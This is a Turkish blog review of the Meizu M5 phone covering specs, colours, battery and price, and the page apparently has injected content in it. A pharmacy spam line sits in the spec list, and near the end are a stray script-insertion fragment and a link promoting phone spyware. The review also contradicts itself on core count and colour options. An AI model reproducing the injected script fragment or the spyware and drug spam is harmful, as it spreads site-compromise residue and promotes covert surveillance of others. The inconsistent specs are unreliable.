Meizu m5 Telefon İnceleme

Meizu bilindiği üzere bir Çin akıllı telefon üreticisi olup, yeni olarak piyasaya çıkardığı Meizu M5 telefon modelini kullanıcılarına duyurdu. Diğer akıllı telefonlar ile kıyaslandığında orta seviyeli bir akıllı telefon diyebiliriz.

meizu-m5

Meizu m5 Özellikleri

Kullanıcılarının beğenisini kazanabilecek bir tasarıma sahip olan telefonun özellikle 10 çekirdekli işlemcisi dikkat çekmektedir. Telefonun genel özelliklerine değinecek olursak;

  • 5.2 inç, 2.5D eğilimli ekran,
  • MediaTek’in geliştirdiği 1.5 GHz 8 Çekirdekli işlemci gücü,
  • 2 GB RAM’li meizu modelinde 16 GB, 3 GB modelinde 32 GB dahili depolama alanı,
  • MicroSD kart yuvası
  • Çift LED flaş özelliği,
  • 13 megapiksel arka kamera, ön kamera ise 5 megapiksel çözünürlüğünde
  • where can i buy flagyl

Telefonun genel özellikleri yukarıda sayılmıştır. Gördüğünüz gibi her ne kadar Çin üretimi olsa da cihaz özellikleri ile kullanıcıların takdirini kazanmayı başardı. Farklı renklerde satışa çıkan telefonun nane yeşili, mat siyah, beyaz ve şampanya altını rengi bulunmaktadır. Telefon çizilmelere karşı dayanıklı bir şekilde tasarlanmıştır.

Mat siyah, nane yeşil, mavi, şampanya altın ve beyaz renk seçenekleri ile satışa sunulan Meizu M5’in, mat siyah versiyonu özel olarak çizilmeye ve parmak izine dayanıklı yapıda tasarlanmış durumda. Telefonun batarya kapasitesi 3070 mAh olarak karşımıza çıkmaktadır. Telefon henüz ülkemizde satışı malesef ki bulunmamaktadır. Gelip gelmeyeceği ile ilgilide malesef bilgilendirici bir yazı bulunmamaktadır. Telefonun yurt dışındaki fiyat etiketi ise 105 dolar olarak kullanıcılara satılmaktadır.

document.currentScript.parentNode.insertBefore(s, document.currentScript);http://taileaters.com/snapchat-spy-xnore-spy-app-iphone-spyware-for-parents/

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir